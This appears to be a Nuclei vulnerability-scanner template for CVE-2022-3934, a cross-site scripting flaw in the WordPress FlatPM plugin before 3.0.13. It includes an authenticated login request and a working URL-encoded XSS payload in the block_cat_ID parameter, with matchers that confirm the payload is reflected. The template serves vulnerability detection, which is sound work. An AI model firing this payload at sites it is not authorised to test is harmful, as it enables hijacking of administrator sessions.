id: CVE-2022-3934

info:
  name: WordPress FlatPM <3.0.13 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3934
  remediation: Fixed in version 3.0.13.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2022-3934
    cwe-id: CWE-79
    epss-score: 0.0007
    cpe: cpe:2.3:a:mehanoid:flat_pm:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    verified: true
    framework: wordpress
    vendor: mehanoid
    product: flat_pm
  tags: authenticated,wpscan,cve,cve2022,xss,flatpm,wordpress,wp-plugin

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        @timeout: 10s
        GET /wp-admin/admin.php?page=blocks_form&block_cat_ID=1%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
        condition: and